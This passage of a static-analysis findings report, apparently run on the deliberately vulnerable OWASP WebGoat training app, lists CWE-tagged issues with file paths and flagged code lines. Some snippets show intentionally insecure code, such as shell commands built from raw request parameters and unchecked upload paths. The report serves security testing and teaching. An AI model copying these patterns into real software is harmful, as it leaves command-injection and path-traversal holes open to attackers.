s.getParser().getStringParameter(METHOD, """")",No,"CERT-J:IDS52-J,CWE:95,OWASP:2013:A1,OWASP:2013:A5,PCI-DSS:6.5.6,WASC:20",none,"CWEScope:Access-Control,CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity,CWEScope:Non-Repudiation", +OPT.JSP.SEC_JSP.TargetBlankVulnerability,Improper Neutralization of links to external sites,High,1022,Security,Injection,JSP,06m,webgoat-container/src/main/webapp/webgoat.jsp,101," Erwin Geirnaert",,,,No,"CWE:1022,OWASP:2013:A6,OWASP:2017:A3",none,"CWEScope:Access-Control,CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JSP.SEC_JSP.TargetBlankVulnerability,Improper Neutralization of links to external sites,High,1022,Security,Injection,JSP,06m,webgoat-container/src/main/webapp/webgoat.jsp,103," Aung Khant",,,,No,"CWE:1022,OWASP:2013:A6,OWASP:2017:A3",none,"CWEScope:Access-Control,CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.UserControlledSQLPrimaryKey,Avoid using an user controlled Primary Key into a query,High,566,Security,Injection,Java,30m,cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/crosssitescripting/EditProfileCrossSiteScripting.java,87," answer_statement.setInt(1, subjectUserId);",webgoat-container/src/main/java/org/owasp/webgoat/session/ParameterParser.java,387, return Integer.parseInt(getStringParameter(name));,No,CWE:566,none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.UserControlledSQLPrimaryKey,Avoid using an user controlled Primary Key into a query,High,566,Security,Injection,Java,30m,cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/crosssitescripting/UpdateProfileCrossSiteScripting.java,211," ps.setInt(13, subjectId);",webgoat-container/src/main/java/org/owasp/webgoat/session/ParameterParser.java,387, return Integer.parseInt(getStringParameter(name));,No,CWE:566,none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.UserControlledSQLPrimaryKey,Avoid using an user controlled Primary Key into a query,High,566,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,293," answer_statement.setInt(1, userId);",role-based-access-control/src/main/java/instructor/RoleBasedAccessControl_i.java,152,"userId = Integer.parseInt((String) s.getRequest().getSession() + .getAttribute(getLessonName() + ""."" + GoatHillsFinancial.USER_ID))",No,CWE:566,none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.UserControlledSQLPrimaryKey,Avoid using an user controlled Primary Key into a query,High,566,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,293," answer_statement.setInt(1, userId);",role-based-access-control/src/main/java/org/owasp/webgoat/plugin/rollbased/RoleBasedAccessControl.java,293,"userId = Integer.parseInt((String) s.getRequest().getSession() + .getAttribute(getLessonName() + ""."" + RoleBasedAccessControl.USER_ID))",No,CWE:566,none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.UserControlledSQLPrimaryKey,Avoid using an user controlled Primary Key into a query,High,566,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,293," answer_statement.setInt(1, userId);",role-based-access-control/src/main/java/org/owasp/webgoat/plugin/rollbased/RoleBasedAccessControl.java,417,"userId = Integer.parseInt((String) s.getRequest().getSession() + .getAttribute(getLessonName() + ""."" + RoleBasedAccessControl.USER_ID))",No,CWE:566,none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.UserControlledSQLPrimaryKey,Avoid using an user controlled Primary Key into a query,High,566,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,293," answer_statement.setInt(1, userId);",goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,133, String ss = (String) s.getRequest().getSession().getAttribute(name);,No,CWE:566,none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.UserControlledSQLPrimaryKey,Avoid using an user controlled Primary Key into a query,High,566,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,293," answer_statement.setInt(1, userId);",goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,104, String value = (String) s.getRequest().getSession().getAttribute(name);,No,CWE:566,none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.UserControlledSQLPrimaryKey,Avoid using an user controlled Primary Key into a query,High,566,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,293," answer_statement.setInt(1, userId);",goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,133, String ss = (String) s.getRequest().getSession().getAttribute(name);,No,CWE:566,none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.UserControlledSQLPrimaryKey,Avoid using an user controlled Primary Key into a query,High,566,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,294," answer_statement.setInt(2, employeeId);",webgoat-container/src/main/java/org/owasp/webgoat/session/ParameterParser.java,387, return Integer.parseInt(getStringParameter(name));,No,CWE:566,none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.UserControlledSQLPrimaryKey,Avoid using an user controlled Primary Key into a query,High,566,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,294," answer_statement.setInt(2, employeeId);",webgoat-container/src/main/java/org/owasp/webgoat/session/ParameterParser.java,387, return Integer.parseInt(getStringParameter(name));,No,CWE:566,none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.UserControlledSQLPrimaryKey,Avoid using an user controlled Primary Key into a query,High,566,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,294," answer_statement.setInt(2, employeeId);",webgoat-container/src/main/java/org/owasp/webgoat/session/ParameterParser.java,387, return Integer.parseInt(getStringParameter(name));,No,CWE:566,none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.UserControlledSQLPrimaryKey,Avoid using an user controlled Primary Key into a query,High,566,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,294," answer_statement.setInt(2, employeeId);",webgoat-container/src/main/java/org/owasp/webgoat/session/ParameterParser.java,387, return Integer.parseInt(getStringParameter(name));,No,CWE:566,none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.UserControlledSQLPrimaryKey,Avoid using an user controlled Primary Key into a query,High,566,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,294," answer_statement.setInt(2, employeeId);",webgoat-container/src/main/java/org/owasp/webgoat/session/DatabaseUtilities.java,63," return getConnection(s.getUserName(), s.getWebgoatContext());",No,CWE:566,none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.UserControlledSQLPrimaryKey,Avoid using an user controlled Primary Key into a query,High,566,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/EditProfile.java,84," answer_statement.setInt(1, subjectUserId);",webgoat-container/src/main/java/org/owasp/webgoat/session/ParameterParser.java,387, return Integer.parseInt(getStringParameter(name));,No,CWE:566,none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.UserControlledSQLPrimaryKey,Avoid using an user controlled Primary Key into a query,High,566,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/UpdateProfile.java,141," ps.setInt(13, subjectId);",webgoat-container/src/main/java/org/owasp/webgoat/session/ParameterParser.java,387, return Integer.parseInt(getStringParameter(name));,No,CWE:566,none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.UserControlledSQLPrimaryKey,Avoid using an user controlled Primary Key into a query,High,566,Security,Injection,Java,30m,role-based-access-control/src/main/java/instructor/UpdateProfile_i.java,66," ps.setInt(13, subjectId);",webgoat-container/src/main/java/org/owasp/webgoat/session/ParameterParser.java,387, return Integer.parseInt(getStringParameter(name));,No,CWE:566,none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.UserControlledSQLPrimaryKey,Avoid using an user controlled Primary Key into a query,High,566,Security,Injection,Java,30m,role-based-access-control/src/main/java/org/owasp/webgoat/plugin/rollbased/EditProfileRoleBasedAccessControl.java,86," answer_statement.setInt(1, subjectUserId);",webgoat-container/src/main/java/org/owasp/webgoat/session/ParameterParser.java,387, return Integer.parseInt(getStringParameter(name));,No,CWE:566,none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.UserControlledSQLPrimaryKey,Avoid using an user controlled Primary Key into a query,High,566,Security,Injection,Java,30m,role-based-access-control/src/main/java/org/owasp/webgoat/plugin/rollbased/UpdateProfileRoleBasedAccessControl.java,145," ps.setInt(13, subjectId);",webgoat-container/src/main/java/org/owasp/webgoat/session/ParameterParser.java,387, return Integer.parseInt(getStringParameter(name));,No,CWE:566,none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.TrustBoundaryViolationRule,Trust boundary violation,High,501,Security,Injection,Java,30m,csrf-prompt-by-pass/src/main/java/org/owasp/webgoat/plugin/CsrfPromptByPass.java,101,"httpSession.setAttribute(TRANSFER_FUND_AMOUNT_ATTRIBUTE, transferAmount);",csrf-prompt-by-pass/src/main/java/org/owasp/webgoat/plugin/CsrfPromptByPass.java,66,"transferFunds = HtmlEncoder.encode(s.getParser().getRawParameter(TRANSFER_FUNDS_PARAMETER, """"))",No,"CWE:501,PCI-DSS:6.5.1",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.TrustBoundaryViolationRule,Trust boundary violation,High,501,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,89," s.getRequest().getSession().setAttribute(name, value);",cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/crosssitescripting/FindProfileCrossSiteScripting.java,133, return s.getParser().getRawParameter(name);,No,"CWE:501,PCI-DSS:6.5.1",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.TrustBoundaryViolationRule,Trust boundary violation,High,501,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,89," s.getRequest().getSession().setAttribute(name, value);",db-sql-injection/src/main/java/org/owasp/webgoat/plugin/dbsqlinjection/LoginDBSQLInjection.java,72,employeeId = s.getParser().getStringParameter(DBSQLInjection.EMPLOYEE_ID);,No,"CWE:501,PCI-DSS:6.5.1",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.TrustBoundaryViolationRule,Trust boundary violation,High,501,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,89," s.getRequest().getSession().setAttribute(name, value);",goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,133, String ss = (String) s.getRequest().getSession().getAttribute(name);,No,"CWE:501,PCI-DSS:6.5.1",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.TrustBoundaryViolationRule,Trust boundary violation,High,501,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,89," s.getRequest().getSession().setAttribute(name, value);",goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,133, String ss = (String) s.getRequest().getSession().getAttribute(name);,No,"CWE:501,PCI-DSS:6.5.1",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.TrustBoundaryViolationRule,Trust boundary violation,High,501,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,89," s.getRequest().getSession().setAttribute(name, value);",sql-injection/src/main/java/org/owasp/webgoat/plugin/sqlinjection/LoginSqlInjection.java,70,employeeId = s.getParser().getStringParameter(SQLInjection.EMPLOYEE_ID);,No,"CWE:501,PCI-DSS:6.5.1",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.TrustBoundaryViolationRule,Trust boundary violation,High,501,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,89," s.getRequest().getSession().setAttribute(name, value);",sql-injection/src/main/java/org/owasp/webgoat/plugin/sqlinjection/LoginSqlInjection.java,235,employeeId = s.getParser().getStringParameter(SQLInjection.EMPLOYEE_ID),No,"CWE:501,PCI-DSS:6.5.1",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.TrustBoundaryViolationRule,Trust boundary violation,High,501,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,89," s.getRequest().getSession().setAttribute(name, value);",webgoat-container/src/main/java/org/owasp/webgoat/session/ParameterParser.java,387, return Integer.parseInt(getStringParameter(name));,No,"CWE:501,PCI-DSS:6.5.1",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.TrustBoundaryViolationRule,Trust boundary violation,High,501,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,89," s.getRequest().getSession().setAttribute(name, value);",webgoat-container/src/main/java/org/owasp/webgoat/session/DatabaseUtilities.java,63," return getConnection(s.getUserName(), s.getWebgoatContext());",No,"CWE:501,PCI-DSS:6.5.1",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.TrustBoundaryViolationRule,Trust boundary violation,High,501,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,89," s.getRequest().getSession().setAttribute(name, value);",webgoat-container/src/main/java/org/owasp/webgoat/session/DatabaseUtilities.java,63," return getConnection(s.getUserName(), s.getWebgoatContext());",No,"CWE:501,PCI-DSS:6.5.1",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.TrustBoundaryViolationRule,Trust boundary violation,High,501,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,89," s.getRequest().getSession().setAttribute(name, value);",webgoat-container/src/main/java/org/owasp/webgoat/session/DatabaseUtilities.java,63," return getConnection(s.getUserName(), s.getWebgoatContext());",No,"CWE:501,PCI-DSS:6.5.1",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.TrustBoundaryViolationRule,Trust boundary violation,High,501,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,89," s.getRequest().getSession().setAttribute(name, value);",webgoat-container/src/main/java/org/owasp/webgoat/session/DatabaseUtilities.java,63," return getConnection(s.getUserName(), s.getWebgoatContext());",No,"CWE:501,PCI-DSS:6.5.1",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.TrustBoundaryViolationRule,Trust boundary violation,High,501,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,89," s.getRequest().getSession().setAttribute(name, value);",webgoat-container/src/main/java/org/owasp/webgoat/session/DatabaseUtilities.java,63," return getConnection(s.getUserName(), s.getWebgoatContext());",No,"CWE:501,PCI-DSS:6.5.1",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.TrustBoundaryViolationRule,Trust boundary violation,High,501,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,89," s.getRequest().getSession().setAttribute(name, value);",webgoat-container/src/main/java/org/owasp/webgoat/session/DatabaseUtilities.java,63," return getConnection(s.getUserName(), s.getWebgoatContext());",No,"CWE:501,PCI-DSS:6.5.1",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.TrustBoundaryViolationRule,Trust boundary violation,High,501,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,89," s.getRequest().getSession().setAttribute(name, value);",webgoat-container/src/main/java/org/owasp/webgoat/session/DatabaseUtilities.java,63," return getConnection(s.getUserName(), s.getWebgoatContext());",No,"CWE:501,PCI-DSS:6.5.1",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.RaceConditionServlet,Race Condition in a Java Servlet,High,362,Security,Control flow management,Java,06m,webgoat-container/src/main/java/org/owasp/webgoat/HammerHead.java,64,Logger logger = LoggerFactory.getLogger(HammerHead.class);,,,,No,"CERT-J:VNA02-J,CWE:362,SANS25:2010:25",none,"CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.RaceConditionServlet,Race Condition in a Java Servlet,High,362,Security,Control flow management,Java,06m,webgoat-container/src/main/java/org/owasp/webgoat/HammerHead.java,93,WebgoatContext webgoatContext = null;,,,,No,"CERT-J:VNA02-J,CWE:362,SANS25:2010:25",none,"CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.UnnormalizedInputString,Always normalize system inputs,Normal,180,Security,Injection,Java,30m,blind-script/src/main/java/org/owasp/webgoat/plugin/BlindScript.java,162,dir = new File(userHome),blind-script/src/main/java/org/owasp/webgoat/plugin/BlindScript.java,160,"userHome = System.getProperty(""user.home"" ) + ""\\Local Settings\\Temporary Internet Files""",No,"CERT-J:IDS01-J,CWE:180",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.UnnormalizedInputString,Always normalize system inputs,Normal,180,Security,Injection,Java,30m,challenge/src/main/java/org/owasp/webgoat/plugin/ChallengeScreen.java,379,"defacedText = getFileText(new BufferedReader(new FileReader(origpath)), false)",challenge/src/main/java/org/owasp/webgoat/plugin/ChallengeScreen.java,377,"origpath = s.getContext().getRealPath(WEBGOAT_CHALLENGE + ""_"" + s.getUserName() + JSP)",No,"CERT-J:IDS01-J,CWE:180",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.UnnormalizedInputString,Always normalize system inputs,Normal,180,Security,Injection,Java,30m,challenge/src/main/java/org/owasp/webgoat/plugin/ChallengeScreen.java,417,usersFile = new File(defacedpath),challenge/src/main/java/org/owasp/webgoat/plugin/ChallengeScreen.java,413,"defacedpath = s.getContext().getRealPath(WEBGOAT_CHALLENGE + ""_"" + s.getUserName() + JSP)",No,"CERT-J:IDS01-J,CWE:180",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.UnnormalizedInputString,Always normalize system inputs,Normal,180,Security,Injection,Java,30m,challenge/src/main/java/org/owasp/webgoat/plugin/ChallengeScreen.java,418,fw = new FileWriter(usersFile),challenge/src/main/java/org/owasp/webgoat/plugin/ChallengeScreen.java,413,"defacedpath = s.getContext().getRealPath(WEBGOAT_CHALLENGE + ""_"" + s.getUserName() + JSP)",No,"CERT-J:IDS01-J,CWE:180",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.UnnormalizedInputString,Always normalize system inputs,Normal,180,Security,Injection,Java,30m,command-injection/src/main/java/org/owasp/webgoat/plugin/CommandInjection.java,127,"fileData = exec(s, ""cmd.exe /c type \"""" + new File(safeDir, helpFile).getPath() + ""\"""");",command-injection/src/main/java/org/owasp/webgoat/plugin/CommandInjection.java,86,"helpFile = s.getParser().getRawParameter(HELP_FILE, ""BasicAuthentication.help"")",No,"CERT-J:IDS01-J,CWE:180",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.UnnormalizedInputString,Always normalize system inputs,Normal,180,Security,Injection,Java,30m,command-injection/src/main/java/org/owasp/webgoat/plugin/CommandInjection.java,134,"cmd2 = {""/bin/sh"", ""-c"", ""cat \"""" + new File(safeDir, helpFile).getPath() + ""\""""}",command-injection/src/main/java/org/owasp/webgoat/plugin/CommandInjection.java,86,"helpFile = s.getParser().getRawParameter(HELP_FILE, ""BasicAuthentication.help"")",No,"CERT-J:IDS01-J,CWE:180",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.UnnormalizedInputString,Always normalize system inputs,Normal,180,Security,Injection,Java,30m,cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/crosssitescripting/CrossSiteScripting.java,114,"src = readFromFile(new BufferedReader(new FileReader(s.getWebResource(getLessonSolutionFileName(s)))), + false);",webgoat-container/src/main/java/org/owasp/webgoat/session/UserTracker.java,181," return getLessonTracker(s, s.getUserName(), screen);",No,"CERT-J:IDS01-J,CWE:180",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.UnnormalizedInputString,Always normalize system inputs,Normal,180,Security,Injection,Java,30m,malicious-file-execution/src/main/java/org/owasp/webgoat/plugin/MaliciousFileExecution.java,98,"userfile = new File(uploads_and_target_parent_directory + + TARGET_RELATIVE_PATH + java.io.File.separator + + s.getUserName() + "".txt"")",malicious-file-execution/src/main/java/org/owasp/webgoat/plugin/MaliciousFileExecution.java,100,"userfile = new File(uploads_and_target_parent_directory + + TARGET_RELATIVE_PATH + java.io.File.separator + + s.getUserName() + "".txt"")",No,"CERT-J:IDS01-J,CWE:180",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.UnnormalizedInputString,Always normalize system inputs,Normal,180,Security,Injection,Java,30m,malicious-file-execution/src/main/java/org/owasp/webgoat/plugin/MaliciousFileExecution.java,128,"userfile = new File(uploads_and_target_parent_directory + + TARGET_RELATIVE_PATH + java.io.File.separator + + s.getUserName() + "".txt"")",malicious-file-execution/src/main/java/org/owasp/webgoat/plugin/MaliciousFileExecution.java,130,"userfile = new File(uploads_and_target_parent_directory + + TARGET_RELATIVE_PATH + java.io.File.separator + + s.getUserName() + "".txt"")",No,"CERT-J:IDS01-J,CWE:180",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.UnnormalizedInputString,Always normalize system inputs,Normal,180,Security,Injection,Java,30m,malicious-file-execution/src/main/java/org/owasp/webgoat/plugin/MaliciousFileExecution.java,277,"userfile = new File(uploads_and_target_parent_directory + + TARGET_RELATIVE_PATH + + java.io.File.separator + + s.getUserName() + "".txt"")",malicious-file-execution/src/main/java/org/owasp/webgoat/plugin/MaliciousFileExecution.java,280,"userfile = new File(uploads_and_target_parent_directory + + TARGET_RELATIVE_PATH + + java.io.File.separator + + s.getUserName() + "".txt"")",No,"CERT-J:IDS01-J,CWE:180",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.UnnormalizedInputString,Always normalize system inputs,Normal,180,Security,Injection,Java,30m,malicious-file-execution/src/main/java/org/owasp/webgoat/plugin/MaliciousFileExecution.java,441,uploadedFile = new File(uploaded_file_path),malicious-file-execution/src/main/java/org/owasp/webgoat/plugin/MaliciousFileExecution.java,440,"uploaded_file_path = uploads_and_target_parent_directory + + UPLOADS_RELATIVE_PATH + + java.io.File.separator + + item.getName()",No,"CERT-J:IDS01-J,CWE:180",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.UnnormalizedInputString,Always normalize system inputs,Normal,180,Security,Injection,Java,30m,malicious-file-execution/src/main/java/org/owasp/webgoat/plugin/MaliciousFileExecution.java,442,item.write(uploadedFile);,malicious-file-execution/src/main/java/org/owasp/webgoat/plugin/MaliciousFileExecution.java,440,"uploaded_file_path = uploads_and_target_parent_directory + + UPLOADS_RELATIVE_PATH + + java.io.File.separator + + item.getName()",No,"CERT-J:IDS01-J,CWE:180",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.UnnormalizedInputString,Always normalize system inputs,Normal,180,Security,Injection,Java,30m,role-based-access-control/src/main/java/org/owasp/webgoat/plugin/rollbased/RoleBasedAccessControl.java,189,"src = readFromFile(new BufferedReader(new FileReader(s.getWebResource(getLessonSolutionFileName(s)))), + false);",webgoat-container/src/main/java/org/owasp/webgoat/session/UserTracker.java,181," return getLessonTracker(s, s.getUserName(), screen);",No,"CERT-J:IDS01-J,CWE:180",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.UnnormalizedInputString,Always normalize system inputs,Normal,180,Security,Injection,Java,30m,sql-injection/src/main/java/org/owasp/webgoat/plugin/sqlinjection/SQLInjection.java,262,"src = readFromFile(new BufferedReader(new FileReader(s.getWebResource(getLessonSolutionFileName(s)))), + false);",webgoat-container/src/main/java/org/owasp/webgoat/session/UserTracker.java,181," return getLessonTracker(s, s.getUserName(), screen);",No,"CERT-J:IDS01-J,CWE:180",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.UnnormalizedInputString,Always normalize system inputs,Normal,180,Security,Injection,Java,30m,webgoat-container/src/main/java/org/owasp/webgoat/lessons/AbstractLesson.java,437," src.append(readFromFile(new BufferedReader(new FileReader(filename)), false));",webgoat-container/src/main/java/org/owasp/webgoat/service/LessonPlanService.java,60,HttpSession session,No,"CERT-J:IDS01-J,CWE:180",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.UnnormalizedInputString,Always normalize system inputs,Normal,180,Security,Injection,Java,30m,webgoat-container/src/main/java/org/owasp/webgoat/service/PluginReloadService.java,69,"new PluginsLoader(Paths.get(pluginPath), Paths.get(targetPath)).copyJars();",webgoat-container/src/main/java/org/owasp/webgoat/service/PluginReloadService.java,64,HttpSession session,No,"CERT-J:IDS01-J,CWE:180",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.UnnormalizedInputString,Always normalize system inputs,Normal,180,Security,Injection,Java,30m,webgoat-container/src/main/java/org/owasp/webgoat/session/LessonTracker.java,226, in = new FileInputStream(fileName);,webgoat-container/src/main/java/org/owasp/webgoat/session/UserTracker.java,181,"return getLessonTracker(s, s.getUserName(), screen);",No,"CERT-J:IDS01-J,CWE:180",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.UnnormalizedInputString,Always normalize system inputs,Normal,180,Security,Injection,Java,30m,webgoat-container/src/main/java/org/owasp/webgoat/session/LessonTracker.java,377, out = new FileOutputStream(fileName);,webgoat-container/src/main/java/org/owasp/webgoat/session/LessonTracker.java,350,"store(s, screen, s.getUserName());",No,"CERT-J:IDS01-J,CWE:180",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.UnnormalizedInputString,Always normalize system inputs,Normal,180,Security,Injection,Java,30m,zip-bomb/src/main/java/org/owasp/webgoat/plugin/ZipBomb.java,141,"uploadedFile = new File(tmpDir, item.getName())",zip-bomb/src/main/java/org/owasp/webgoat/plugin/ZipBomb.java,141,"uploadedFile = new File(tmpDir, item.getName())",No,"CERT-J:IDS01-J,CWE:180",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.UnnormalizedInputString,Always normalize system inputs,Normal,180,Security,Injection,Java,30m,zip-bomb/src/main/java/org/owasp/webgoat/plugin/ZipBomb.java,145,item.write(uploadedFile);,zip-bomb/src/main/java/org/owasp/webgoat/plugin/ZipBomb.java,141,"uploadedFile = new File(tmpDir, item.getName())",No,"CERT-J:IDS01-J,CWE:180",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.UnnormalizedInputString,Always normalize system inputs,Normal,180,Security,Injection,Java,30m,zip-bomb/src/main/java/org/owasp/webgoat/plugin/ZipBomb.java,181, ZipFile zf = new ZipFile(uploadedFile);,zip-bomb/src/main/java/org/owasp/webgoat/plugin/ZipBomb.java,141,"uploadedFile = new File(tmpDir, item.getName())",No,"CERT-J:IDS01-J,CWE:180",none,CWEScope:Access-Control, +OPT.JAVA.SEC_JAVA.UncheckedInputInLoopCondition,Unchecked input in loop condition,Normal,606,Security,Control flow management,Java,06m,blind-script/src/main/java/org/owasp/webgoat/plugin/BlindScript.java,264, String argString = argsTok.nextToken();,blind-script/src/main/java/org/owasp/webgoat/plugin/BlindScript.java,126,"argTypes = s.getParser().getStringParameter(ARG_TYPES, """")",No,CWE:606,none,CWEScope:Availability, +OPT.JAVA.SEC_JAVA.UncheckedInputInLoopCondition,Unchecked input in loop condition,Normal,606,Security,Control flow management,Java,06m,challenge/src/main/java/org/owasp/webgoat/plugin/ChallengeScreen.java,674,line = lines.nextToken();,challenge/src/main/java/org/owasp/webgoat/plugin/ChallengeScreen.java,639,"protocol = s.getParser().getRawParameter(PROTOCOL, ""tcp"")",No,CWE:606,none,CWEScope:Availability, +OPT.JAVA.SEC_JAVA.UncheckedInputInLoopCondition,Unchecked input in loop condition,Normal,606,Security,Control flow 